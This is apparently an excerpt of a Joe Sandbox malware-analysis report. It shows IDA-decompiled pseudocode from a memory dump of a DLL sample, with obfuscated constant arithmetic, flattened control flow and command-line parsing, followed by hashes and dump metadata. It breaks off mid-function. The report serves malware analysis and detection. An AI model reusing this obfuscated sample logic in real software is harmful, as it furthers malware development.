                                                                                                                                                                            				signed int _v1588;
                                                                                                                                                                            				signed int _v1592;
                                                                                                                                                                            				signed int _v1596;
                                                                                                                                                                            				signed int _v1600;
                                                                                                                                                                            				signed int _v1604;
                                                                                                                                                                            				signed int _v1608;
                                                                                                                                                                            				signed int _v1612;
                                                                                                                                                                            				signed int _v1616;
                                                                                                                                                                            				signed int _v1620;
                                                                                                                                                                            				signed int _v1624;
                                                                                                                                                                            				signed int _v1628;
                                                                                                                                                                            				signed int _v1632;
                                                                                                                                                                            				signed int _v1636;
                                                                                                                                                                            				signed int _v1640;
                                                                                                                                                                            				signed int _v1644;
                                                                                                                                                                            				signed int _v1648;
                                                                                                                                                                            				signed int _v1652;
                                                                                                                                                                            				signed int _v1656;
                                                                                                                                                                            				signed int _v1660;
                                                                                                                                                                            				signed int _v1664;
                                                                                                                                                                            				signed int _v1668;
                                                                                                                                                                            				signed int _v1672;
                                                                                                                                                                            				signed int _v1676;
                                                                                                                                                                            				signed int _v1680;
                                                                                                                                                                            				signed int _v1684;
                                                                                                                                                                            				signed int _v1688;
                                                                                                                                                                            				signed int _v1692;
                                                                                                                                                                            				signed int _v1696;
                                                                                                                                                                            				signed int _v1700;
                                                                                                                                                                            				signed int _v1704;
                                                                                                                                                                            				signed int _v1708;
                                                                                                                                                                            				signed int _v1712;
                                                                                                                                                                            				signed int _v1716;
                                                                                                                                                                            				signed int _v1720;
                                                                                                                                                                            				signed short* _t381;
                                                                                                                                                                            				signed int _t393;
                                                                                                                                                                            				signed int _t395;
                                                                                                                                                                            				signed int _t397;
                                                                                                                                                                            				signed int _t398;
                                                                                                                                                                            				signed int _t399;
                                                                                                                                                                            				signed int _t400;
                                                                                                                                                                            				signed int _t401;
                                                                                                                                                                            				signed int _t402;
                                                                                                                                                                            				signed int _t403;
                                                                                                                                                                            				signed int _t404;
                                                                                                                                                                            				signed int _t405;
                                                                                                                                                                            				signed int _t415;
                                                                                                                                                                            				signed int* _t444;
                                                                                                                                                                            				void* _t445;
                                                                                                                                                                            				signed int _t449;
                                                                                                                                                                            				signed int _t450;
                                                                                                                                                                            				signed short* _t451;
                                                                                                                                                                            				signed int* _t452;
                                                                                                                                                                            
                                                                                                                                                                            				_t452 =  &_v1720;
                                                                                                                                                                            				_v1648 = 0xf9e68a;
                                                                                                                                                                            				_v1648 = _v1648 ^ 0xa89cfd85;
                                                                                                                                                                            				_v1648 = _v1648 | 0xe1599fd2;
                                                                                                                                                                            				_v1648 = _v1648 ^ 0xe97d9ff6;
                                                                                                                                                                            				_v1592 = 0x52ca29;
                                                                                                                                                                            				_v1592 = _v1592 + 0xa8c7;
                                                                                                                                                                            				_v1592 = _v1592 ^ 0x005b0974;
                                                                                                                                                                            				_v1632 = 0x5fd17f;
                                                                                                                                                                            				_t397 = 0x55;
                                                                                                                                                                            				_v1632 = _v1632 / _t397;
                                                                                                                                                                            				_v1632 = _v1632 + 0x4a14;
                                                                                                                                                                            				_t395 = 0;
                                                                                                                                                                            				_v1632 = _v1632 ^ 0x0007d59d;
                                                                                                                                                                            				_t445 = 0x5f4d19a;
                                                                                                                                                                            				_v1584 = 0xb2803c;
                                                                                                                                                                            				_t398 = 0x15;
                                                                                                                                                                            				_v1584 = _v1584 / _t398;
                                                                                                                                                                            				_v1584 = _v1584 ^ 0x0001d429;
                                                                                                                                                                            				_v1700 = 0x18b17c;
                                                                                                                                                                            				_v1700 = _v1700 >> 4;
                                                                                                                                                                            				_v1700 = _v1700 << 0xb;
                                                                                                                                                                            				_v1700 = _v1700 | 0x5bcbde76;
                                                                                                                                                                            				_v1700 = _v1700 ^ 0x5fd8859a;
                                                                                                                                                                            				_v1716 = 0x3ed9a0;
                                                                                                                                                                            				_v1716 = _v1716 >> 2;
                                                                                                                                                                            				_v1716 = _v1716 | 0xf2214935;
                                                                                                                                                                            				_v1716 = _v1716 + 0xffff6098;
                                                                                                                                                                            				_v1716 = _v1716 ^ 0xf2246cf7;
                                                                                                                                                                            				_v1616 = 0xd3100b;
                                                                                                                                                                            				_v1616 = _v1616 << 0xb;
                                                                                                                                                                            				_v1616 = _v1616 ^ 0x988d1f7d;
                                                                                                                                                                            				_v1576 = 0x49dab3;
                                                                                                                                                                            				_t399 = 0x41;
                                                                                                                                                                            				_v1576 = _v1576 / _t399;
                                                                                                                                                                            				_v1576 = _v1576 ^ 0x00091b0c;
                                                                                                                                                                            				_v1604 = 0x610b2e;
                                                                                                                                                                            				_v1604 = _v1604 >> 3;
                                                                                                                                                                            				_v1604 = _v1604 ^ 0x000d4028;
                                                                                                                                                                            				_v1708 = 0x5e4148;
                                                                                                                                                                            				_v1708 = _v1708 * 0x7c;
                                                                                                                                                                            				_v1708 = _v1708 + 0x543c;
                                                                                                                                                                            				_v1708 = _v1708 * 0x6e;
                                                                                                                                                                            				_v1708 = _v1708 ^ 0x9e2c7101;
                                                                                                                                                                            				_v1580 = 0x8fa7d1;
                                                                                                                                                                            				_v1580 = _v1580 | 0x5a90bc2e;
                                                                                                                                                                            				_v1580 = _v1580 ^ 0x5a99780a;
                                                                                                                                                                            				_v1644 = 0xdfbfec;
                                                                                                                                                                            				_v1644 = _v1644 ^ 0x5e27e596;
                                                                                                                                                                            				_v1644 = _v1644 + 0xffff45c7;
                                                                                                                                                                            				_v1644 = _v1644 ^ 0x5efb0694;
                                                                                                                                                                            				_v1652 = 0xa5c8eb;
                                                                                                                                                                            				_v1652 = _v1652 ^ 0x9b43bc99;
                                                                                                                                                                            				_v1652 = _v1652 * 0x26;
                                                                                                                                                                            				_v1652 = _v1652 ^ 0x243194e2;
                                                                                                                                                                            				_v1596 = 0xb87d2a;
                                                                                                                                                                            				_v1596 = _v1596 ^ 0x06815b6e;
                                                                                                                                                                            				_v1596 = _v1596 ^ 0x0639024b;
                                                                                                                                                                            				_v1568 = 0xf0e227;
                                                                                                                                                                            				_v1568 = _v1568 * 0x3d;
                                                                                                                                                                            				_v1568 = _v1568 ^ 0x396ce50f;
                                                                                                                                                                            				_v1572 = 0x747c0d;
                                                                                                                                                                            				_v1572 = _v1572 + 0xffffb798;
                                                                                                                                                                            				_v1572 = _v1572 ^ 0x0071a7b9;
                                                                                                                                                                            				_v1656 = 0x3795ed;
                                                                                                                                                                            				_v1656 = _v1656 | 0xbce94746;
                                                                                                                                                                            				_t400 = 0x26;
                                                                                                                                                                            				_v1656 = _v1656 / _t400;
                                                                                                                                                                            				_v1656 = _v1656 ^ 0x04ffd641;
                                                                                                                                                                            				_v1628 = 0xc97098;
                                                                                                                                                                            				_t401 = 0x3f;
                                                                                                                                                                            				_v1628 = _v1628 / _t401;
                                                                                                                                                                            				_v1628 = _v1628 << 2;
                                                                                                                                                                            				_v1628 = _v1628 ^ 0x0000c1e6;
                                                                                                                                                                            				_v1664 = 0x186675;
                                                                                                                                                                            				_v1664 = _v1664 + 0x5979;
                                                                                                                                                                            				_v1664 = _v1664 + 0xda5e;
                                                                                                                                                                            				_v1664 = _v1664 ^ 0x0013e2ca;
                                                                                                                                                                            				_v1672 = 0x37994d;
                                                                                                                                                                            				_t402 = 0x3c;
                                                                                                                                                                            				_v1672 = _v1672 / _t402;
                                                                                                                                                                            				_v1672 = _v1672 << 6;
                                                                                                                                                                            				_v1672 = _v1672 ^ 0x0033bfe5;
                                                                                                                                                                            				_v1588 = 0x8a41f;
                                                                                                                                                                            				_v1588 = _v1588 ^ 0x744a78fd;
                                                                                                                                                                            				_v1588 = _v1588 ^ 0x744e2179;
                                                                                                                                                                            				_v1720 = 0x535779;
                                                                                                                                                                            				_v1720 = _v1720 << 0xd;
                                                                                                                                                                            				_v1720 = _v1720 + 0x4332;
                                                                                                                                                                            				_v1720 = _v1720 + 0x735f;
                                                                                                                                                                            				_v1720 = _v1720 ^ 0x6aed3196;
                                                                                                                                                                            				_v1692 = 0x449a24;
                                                                                                                                                                            				_t403 = 0x7f;
                                                                                                                                                                            				_v1692 = _v1692 / _t403;
                                                                                                                                                                            				_v1692 = _v1692 >> 0xb;
                                                                                                                                                                            				_v1692 = _v1692 | 0x1a1cc036;
                                                                                                                                                                            				_v1692 = _v1692 ^ 0x1a141e74;
                                                                                                                                                                            				_v1680 = 0xcbdb4c;
                                                                                                                                                                            				_t404 = 0x32;
                                                                                                                                                                            				_v1680 = _v1680 / _t404;
                                                                                                                                                                            				_v1680 = _v1680 + 0xffff62cd;
                                                                                                                                                                            				_v1680 = _v1680 ^ 0x0005b6c2;
                                                                                                                                                                            				_v1712 = 0x490fe1;
                                                                                                                                                                            				_v1712 = _v1712 + 0xffff5c72;
                                                                                                                                                                            				_v1712 = _v1712 | 0x8d0799de;
                                                                                                                                                                            				_v1712 = _v1712 + 0xd1c7;
                                                                                                                                                                            				_v1712 = _v1712 ^ 0x8d59d7bd;
                                                                                                                                                                            				_v1564 = 0xeb31a6;
                                                                                                                                                                            				_v1564 = _v1564 + 0x9db9;
                                                                                                                                                                            				_v1564 = _v1564 ^ 0x00ef2ed2;
                                                                                                                                                                            				_v1636 = 0x2bc790;
                                                                                                                                                                            				_v1636 = _v1636 << 0xd;
                                                                                                                                                                            				_v1636 = _v1636 + 0xc361;
                                                                                                                                                                            				_v1636 = _v1636 ^ 0x78fc9b03;
                                                                                                                                                                            				_v1608 = 0x9c27ff;
                                                                                                                                                                            				_t405 = 0x79;
                                                                                                                                                                            				_v1608 = _v1608 / _t405;
                                                                                                                                                                            				_v1608 = _v1608 ^ 0x00083646;
                                                                                                                                                                            				_v1612 = 0x2811b5;
                                                                                                                                                                            				_v1612 = _v1612 << 7;
                                                                                                                                                                            				_v1612 = _v1612 ^ 0x140bb062;
                                                                                                                                                                            				_v1704 = 0x10f563;
                                                                                                                                                                            				_v1704 = _v1704 << 7;
                                                                                                                                                                            				_v1704 = _v1704 + 0x8e91;
                                                                                                                                                                            				_v1704 = _v1704 >> 1;
                                                                                                                                                                            				_v1704 = _v1704 ^ 0x043150d1;
                                                                                                                                                                            				_v1668 = 0xd17281;
                                                                                                                                                                            				_v1668 = _v1668 + 0xffff6975;
                                                                                                                                                                            				_v1668 = _v1668 * 5;
                                                                                                                                                                            				_v1668 = _v1668 ^ 0x041d3199;
                                                                                                                                                                            				_v1676 = 0x45cf94;
                                                                                                                                                                            				_v1676 = _v1676 | 0xf5b6f9ff;
                                                                                                                                                                            				_v1676 = _v1676 ^ 0xf5f7fea4;
                                                                                                                                                                            				_v1640 = 0xed0f5a;
                                                                                                                                                                            				_v1640 = _v1640 | 0x16dcab92;
                                                                                                                                                                            				_v1640 = _v1640 ^ 0xea8ad617;
                                                                                                                                                                            				_v1640 = _v1640 ^ 0xfc77378a;
                                                                                                                                                                            				_v1684 = 0xfd4b0d;
                                                                                                                                                                            				_v1684 = _v1684 ^ 0xf5deb09c;
                                                                                                                                                                            				_v1684 = _v1684 * 0x14;
                                                                                                                                                                            				_v1684 = _v1684 ^ 0x26c6ef50;
                                                                                                                                                                            				_v1600 = 0xb07e76;
                                                                                                                                                                            				_v1600 = _v1600 + 0x891d;
                                                                                                                                                                            				_v1600 = _v1600 ^ 0x00bcbcf5;
                                                                                                                                                                            				_v1660 = 0xdc9573;
                                                                                                                                                                            				_v1660 = _v1660 | 0xf03871f4;
                                                                                                                                                                            				_v1660 = _v1660 >> 9;
                                                                                                                                                                            				_v1660 = _v1660 ^ 0x0071eac7;
                                                                                                                                                                            				_v1620 = 0x8203d2;
                                                                                                                                                                            				_v1620 = _v1620 ^ 0xa8466021;
                                                                                                                                                                            				_v1620 = _v1620 ^ 0xa8c8da0e;
                                                                                                                                                                            				_v1688 = 0x3e6237;
                                                                                                                                                                            				_v1688 = _v1688 + 0x1a50;
                                                                                                                                                                            				_v1688 = _v1688 >> 3;
                                                                                                                                                                            				_t451 = _v1620;
                                                                                                                                                                            				_v1688 = _v1688 * 0x2f;
                                                                                                                                                                            				_v1688 = _v1688 ^ 0x0160f017;
                                                                                                                                                                            				_v1696 = 0x29d1f1;
                                                                                                                                                                            				_v1696 = _v1696 + 0xffffde63;
                                                                                                                                                                            				_v1696 = _v1696 + 0xffff46cf;
                                                                                                                                                                            				_v1696 = _v1696 * 0x14;
                                                                                                                                                                            				_v1696 = _v1696 ^ 0x033cdd59;
                                                                                                                                                                            				_v1624 = 0xc011c7;
                                                                                                                                                                            				_v1624 = _v1624 + 0xffff119f;
                                                                                                                                                                            				_v1624 = _v1624 >> 7;
                                                                                                                                                                            				_v1624 = _v1624 ^ 0x00036cbb;
                                                                                                                                                                            				while(_t445 != 0x2906f2f) {
                                                                                                                                                                            					if(_t445 == 0x5f4d19a) {
                                                                                                                                                                            						E02F6FE2A(_v1592, _v1632, 0x208,  &_v1560);
                                                                                                                                                                            						_pop(_t405);
                                                                                                                                                                            						_t445 = 0x2906f2f;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t445 == 0x6d37c50) {
                                                                                                                                                                            						_t381 = _t451;
                                                                                                                                                                            						__eflags =  *_t451 - _t395;
                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                            							L17:
                                                                                                                                                                            							_t445 = 0xfe0ac9e;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							goto L10;
                                                                                                                                                                            						}
                                                                                                                                                                            						do {
                                                                                                                                                                            							L10:
                                                                                                                                                                            							__eflags =  *_t381 - 0x2c;
                                                                                                                                                                            							if( *_t381 != 0x2c) {
                                                                                                                                                                            								goto L16;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t444 =  &_v1560;
                                                                                                                                                                            							while(1) {
                                                                                                                                                                            								_t381 =  &(_t381[1]);
                                                                                                                                                                            								_t415 =  *_t381 & 0x0000ffff;
                                                                                                                                                                            								__eflags = _t415;
                                                                                                                                                                            								if(_t415 == 0) {
                                                                                                                                                                            									break;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags = _t415 - 0x20;
                                                                                                                                                                            								if(_t415 == 0x20) {
                                                                                                                                                                            									break;
                                                                                                                                                                            								}
                                                                                                                                                                            								 *_t444 = _t415;
                                                                                                                                                                            								_t444 =  &(_t444[0]);
                                                                                                                                                                            								__eflags = _t444;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t405 = 0;
                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                            							 *_t444 = 0;
                                                                                                                                                                            							L16:
                                                                                                                                                                            							_t381 =  &(_t381[1]);
                                                                                                                                                                            							__eflags =  *_t381 - _t395;
                                                                                                                                                                            						} while (__eflags != 0);
                                                                                                                                                                            						goto L17;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t445 == 0x88437ca) {
                                                                                                                                                                            						E02F51A34(_v1572,  &_v1040, _t405, _t405, _v1656, _v1628, _v1664, _t405, _v1648, _v1672);
                                                                                                                                                                            						E02F70DB1(_v1588,  &_v520, __eflags, _v1720, _v1572, _v1692);
                                                                                                                                                                            						_push(_v1636);
                                                                                                                                                                            						_push(_v1564);
                                                                                                                                                                            						_push(_v1712);
                                                                                                                                                                            						_t449 = E02F6E1F8(0x2f51160, _v1680, __eflags);
                                                                                                                                                                            						E02F72D0A(_v1612, __eflags,  &_v520, _v1704, _v1668, _v1676, 0x2f51160, _t451,  &_v1040, _t449);
                                                                                                                                                                            						_t405 = _t449;
                                                                                                                                                                            						E02F6FECB(_t405, _v1640, _v1684, _v1600, _v1660);
                                                                                                                                                                            						_t452 =  &(_t452[0x19]);
                                                                                                                                                                            						_t445 = 0xc3a6a1c;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t445 == 0xc3a6a1c) {
                                                                                                                                                                            						_push(_t405);
                                                                                                                                                                            						E02F685FF(_v1620, _v1688, __eflags, _t395, _t451, _t395, _v1696, _t395, _v1624);
                                                                                                                                                                            						_t395 = 1;
                                                                                                                                                                            						__eflags = 1;
                                                                                                                                                                            						L23:
                                                                                                                                                                            						return _t395;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t462 = _t445 - 0xfe0ac9e;
                                                                                                                                                                            					if(_t445 == 0xfe0ac9e) {
                                                                                                                                                                            						_push(_v1576);
                                                                                                                                                                            						_push(_v1616);
                                                                                                                                                                            						_push(_v1716);
                                                                                                                                                                            						_t450 = E02F6E1F8(0x2f51120, _v1700, _t462);
                                                                                                                                                                            						_t393 = E02F7061D(_v1604, _t450,  &_v1560, _v1708, _v1580); // executed
                                                                                                                                                                            						_t405 = _t450;
                                                                                                                                                                            						asm("sbb edi, edi");
                                                                                                                                                                            						_t445 = ( ~_t393 & 0x02221bd6) + 0x6621bf4;
                                                                                                                                                                            						E02F6FECB(_t405, _v1644, _v1652, _v1596, _v1568);
                                                                                                                                                                            						_t452 =  &(_t452[9]);
                                                                                                                                                                            					}
                                                                                                                                                                            					L20:
                                                                                                                                                                            					if(_t445 != 0x6621bf4) {
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L23;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t451 = E02F5C307();
                                                                                                                                                                            				_t445 = 0x6d37c50;
                                                                                                                                                                            				goto L20;
                                                                                                                                                                            			}

































































                                                                                                                                                                            0x02f6efdd
                                                                                                                                                                            0x02f6efe3
                                                                                                                                                                            0x02f6efed
                                                                                                                                                                            0x02f6eff5
                                                                                                                                                                            0x02f6effd
                                                                                                                                                                            0x02f6f005
                                                                                                                                                                            0x02f6f010
                                                                                                                                                                            0x02f6f01b
                                                                                                                                                                            0x02f6f026
                                                                                                                                                                            0x02f6f038
                                                                                                                                                                            0x02f6f03d
                                                                                                                                                                            0x02f6f043
                                                                                                                                                                            0x02f6f04b
                                                                                                                                                                            0x02f6f04d
                                                                                                                                                                            0x02f6f055
                                                                                                                                                                            0x02f6f05a
                                                                                                                                                                            0x02f6f06c
                                                                                                                                                                            0x02f6f071
                                                                                                                                                                            0x02f6f07a
                                                                                                                                                                            0x02f6f085
                                                                                                                                                                            0x02f6f08d
                                                                                                                                                                            0x02f6f092
                                                                                                                                                                            0x02f6f097
                                                                                                                                                                            0x02f6f09f
                                                                                                                                                                            0x02f6f0a7
                                                                                                                                                                            0x02f6f0af
                                                                                                                                                                            0x02f6f0b4
                                                                                                                                                                            0x02f6f0bc
                                                                                                                                                                            0x02f6f0c4
                                                                                                                                                                            0x02f6f0cc
                                                                                                                                                                            0x02f6f0d4
                                                                                                                                                                            0x02f6f0d9
                                                                                                                                                                            0x02f6f0e1
                                                                                                                                                                            0x02f6f0f3
                                                                                                                                                                            0x02f6f0f6
                                                                                                                                                                            0x02f6f0fd
                                                                                                                                                                            0x02f6f108
                                                                                                                                                                            0x02f6f113
                                                                                                                                                                            0x02f6f11b
                                                                                                                                                                            0x02f6f126
                                                                                                                                                                            0x02f6f133
                                                                                                                                                                            0x02f6f137
                                                                                                                                                                            0x02f6f144
                                                                                                                                                                            0x02f6f148
                                                                                                                                                                            0x02f6f150
                                                                                                                                                                            0x02f6f15b
                                                                                                                                                                            0x02f6f166
                                                                                                                                                                            0x02f6f171
                                                                                                                                                                            0x02f6f179
                                                                                                                                                                            0x02f6f181
                                                                                                                                                                            0x02f6f189
                                                                                                                                                                            0x02f6f191
                                                                                                                                                                            0x02f6f199
                                                                                                                                                                            0x02f6f1a6
                                                                                                                                                                            0x02f6f1aa
                                                                                                                                                                            0x02f6f1b2
                                                                                                                                                                            0x02f6f1bd
                                                                                                                                                                            0x02f6f1c8
                                                                                                                                                                            0x02f6f1d3
                                                                                                                                                                            0x02f6f1e6
                                                                                                                                                                            0x02f6f1ed
                                                                                                                                                                            0x02f6f1f8
                                                                                                                                                                            0x02f6f203
                                                                                                                                                                            0x02f6f210
                                                                                                                                                                            0x02f6f21b
                                                                                                                                                                            0x02f6f223
                                                                                                                                                                            0x02f6f231
                                                                                                                                                                            0x02f6f236
                                                                                                                                                                            0x02f6f23c
                                                                                                                                                                            0x02f6f244
                                                                                                                                                                            0x02f6f250
                                                                                                                                                                            0x02f6f255
                                                                                                                                                                            0x02f6f25b
                                                                                                                                                                            0x02f6f260
                                                                                                                                                                            0x02f6f268
                                                                                                                                                                            0x02f6f270
                                                                                                                                                                            0x02f6f278
                                                                                                                                                                            0x02f6f280
                                                                                                                                                                            0x02f6f288
                                                                                                                                                                            0x02f6f294
                                                                                                                                                                            0x02f6f299
                                                                                                                                                                            0x02f6f29f
                                                                                                                                                                            0x02f6f2a4
                                                                                                                                                                            0x02f6f2ac
                                                                                                                                                                            0x02f6f2b7
                                                                                                                                                                            0x02f6f2c2
                                                                                                                                                                            0x02f6f2cd
                                                                                                                                                                            0x02f6f2d5
                                                                                                                                                                            0x02f6f2da
                                                                                                                                                                            0x02f6f2e2
                                                                                                                                                                            0x02f6f2ea
                                                                                                                                                                            0x02f6f2f2
                                                                                                                                                                            0x02f6f2fe
                                                                                                                                                                            0x02f6f303
                                                                                                                                                                            0x02f6f309
                                                                                                                                                                            0x02f6f30e
                                                                                                                                                                            0x02f6f316
                                                                                                                                                                            0x02f6f31e
                                                                                                                                                                            0x02f6f32a
                                                                                                                                                                            0x02f6f32f
                                                                                                                                                                            0x02f6f335
                                                                                                                                                                            0x02f6f33d
                                                                                                                                                                            0x02f6f345
                                                                                                                                                                            0x02f6f34d
                                                                                                                                                                            0x02f6f355
                                                                                                                                                                            0x02f6f35d
                                                                                                                                                                            0x02f6f365
                                                                                                                                                                            0x02f6f36d
                                                                                                                                                                            0x02f6f378
                                                                                                                                                                            0x02f6f383
                                                                                                                                                                            0x02f6f38e
                                                                                                                                                                            0x02f6f396
                                                                                                                                                                            0x02f6f39b
                                                                                                                                                                            0x02f6f3a3
                                                                                                                                                                            0x02f6f3ab
                                                                                                                                                                            0x02f6f3bd
                                                                                                                                                                            0x02f6f3c0
                                                                                                                                                                            0x02f6f3c7
                                                                                                                                                                            0x02f6f3d2
                                                                                                                                                                            0x02f6f3da
                                                                                                                                                                            0x02f6f3df
                                                                                                                                                                            0x02f6f3e7
                                                                                                                                                                            0x02f6f3ef
                                                                                                                                                                            0x02f6f3f4
                                                                                                                                                                            0x02f6f3fc
                                                                                                                                                                            0x02f6f400
                                                                                                                                                                            0x02f6f408
                                                                                                                                                                            0x02f6f410
                                                                                                                                                                            0x02f6f41d
                                                                                                                                                                            0x02f6f421
                                                                                                                                                                            0x02f6f429
                                                                                                                                                                            0x02f6f431
                                                                                                                                                                            0x02f6f439
                                                                                                                                                                            0x02f6f441
                                                                                                                                                                            0x02f6f449
                                                                                                                                                                            0x02f6f451
                                                                                                                                                                            0x02f6f459
                                                                                                                                                                            0x02f6f461
                                                                                                                                                                            0x02f6f469
                                                                                                                                                                            0x02f6f476
                                                                                                                                                                            0x02f6f47a
                                                                                                                                                                            0x02f6f482
                                                                                                                                                                            0x02f6f48d
                                                                                                                                                                            0x02f6f498
                                                                                                                                                                            0x02f6f4a3
                                                                                                                                                                            0x02f6f4ab
                                                                                                                                                                            0x02f6f4b3
                                                                                                                                                                            0x02f6f4b8
                                                                                                                                                                            0x02f6f4c0
                                                                                                                                                                            0x02f6f4c8
                                                                                                                                                                            0x02f6f4d0
                                                                                                                                                                            0x02f6f4d8
                                                                                                                                                                            0x02f6f4e0
                                                                                                                                                                            0x02f6f4e8
                                                                                                                                                                            0x02f6f4f2
                                                                                                                                                                            0x02f6f4f6
                                                                                                                                                                            0x02f6f4fa
                                                                                                                                                                            0x02f6f502
                                                                                                                                                                            0x02f6f50a
                                                                                                                                                                            0x02f6f512
                                                                                                                                                                            0x02f6f51f
                                                                                                                                                                            0x02f6f523
                                                                                                                                                                            0x02f6f52b
                                                                                                                                                                            0x02f6f533
                                                                                                                                                                            0x02f6f53b
                                                                                                                                                                            0x02f6f540
                                                                                                                                                                            0x02f6f548
                                                                                                                                                                            0x02f6f55a
                                                                                                                                                                            0x02f6f72e
                                                                                                                                                                            0x02f6f734
                                                                                                                                                                            0x02f6f735
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6f735
                                                                                                                                                                            0x02f6f566
                                                                                                                                                                            0x02f6f6d1
                                                                                                                                                                            0x02f6f6d3
                                                                                                                                                                            0x02f6f6d7
                                                                                                                                                                            0x02f6f70c
                                                                                                                                                                            0x02f6f70c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6f6d9
                                                                                                                                                                            0x02f6f6d9
                                                                                                                                                                            0x02f6f6d9
                                                                                                                                                                            0x02f6f6dd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6f6df
                                                                                                                                                                            0x02f6f6f4
                                                                                                                                                                            0x02f6f6f4
                                                                                                                                                                            0x02f6f6f7
                                                                                                                                                                            0x02f6f6fa
                                                                                                                                                                            0x02f6f6fd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6f6e8
                                                                                                                                                                            0x02f6f6ec
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6f6ee
                                                                                                                                                                            0x02f6f6f1
                                                                                                                                                                            0x02f6f6f1
                                                                                                                                                                            0x02f6f6f1
                                                                                                                                                                            0x02f6f6ff
                                                                                                                                                                            0x02f6f6ff
                                                                                                                                                                            0x02f6f701
                                                                                                                                                                            0x02f6f704
                                                                                                                                                                            0x02f6f704
                                                                                                                                                                            0x02f6f707
                                                                                                                                                                            0x02f6f707
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6f6d9
                                                                                                                                                                            0x02f6f572
                                                                                                                                                                            0x02f6f62f
                                                                                                                                                                            0x02f6f64e
                                                                                                                                                                            0x02f6f653
                                                                                                                                                                            0x02f6f65c
                                                                                                                                                                            0x02f6f663
                                                                                                                                                                            0x02f6f673
                                                                                                                                                                            0x02f6f6a2
                                                                                                                                                                            0x02f6f6ab
                                                                                                                                                                            0x02f6f6bf
                                                                                                                                                                            0x02f6f6c4
                                                                                                                                                                            0x02f6f6c7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6f6c7
                                                                                                                                                                            0x02f6f57e
                                                                                                                                                                            0x02f6f760
                                                                                                                                                                            0x02f6f778
                                                                                                                                                                            0x02f6f782
                                                                                                                                                                            0x02f6f782
                                                                                                                                                                            0x02f6f786
                                                                                                                                                                            0x02f6f78f
                                                                                                                                                                            0x02f6f78f
                                                                                                                                                                            0x02f6f584
                                                                                                                                                                            0x02f6f58a
                                                                                                                                                                            0x02f6f590
                                                                                                                                                                            0x02f6f59c
                                                                                                                                                                            0x02f6f5a0
                                                                                                                                                                            0x02f6f5b4
                                                                                                                                                                            0x02f6f5cb
                                                                                                                                                                            0x02f6f5d9
                                                                                                                                                                            0x02f6f5ef
                                                                                                                                                                            0x02f6f5f7
                                                                                                                                                                            0x02f6f5fd
                                                                                                                                                                            0x02f6f602
                                                                                                                                                                            0x02f6f602
                                                                                                                                                                            0x02f6f752
                                                                                                                                                                            0x02f6f758
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6f75e
                                                                                                                                                                            0x02f6f74b
                                                                                                                                                                            0x02f6f74d
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: |t$(@$7b>$<T$HA^$_s$t[$y!Nt$yWS$yY
                                                                                                                                                                            • API String ID: 0-3414766599
                                                                                                                                                                            • Opcode ID: 94751f51a126453f4b4bacf5dc267566728dc8f6f39b83d6d56b0076c3516768
                                                                                                                                                                            • Instruction ID: 8dfca5500a85271f3c1a4e8f46a81c2e57915071f533be57010b527cacaec86d
                                                                                                                                                                            • Opcode Fuzzy Hash: 94751f51a126453f4b4bacf5dc267566728dc8f6f39b83d6d56b0076c3516768
                                                                                                                                                                            • Instruction Fuzzy Hash: C80213725083809FD368CF21D489A5BBBF2FBC5358F508A0DE2DA86260D7B59949CF43
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 46 2f7061d-2f706eb call 2f6fe29 call 2f5eb52 lstrcmpiW
                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                            			E02F7061D(signed int __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				void* _t44;
                                                                                                                                                                            				int _t53;
                                                                                                                                                                            				WCHAR* _t56;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_t56 = __edx;
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t44);
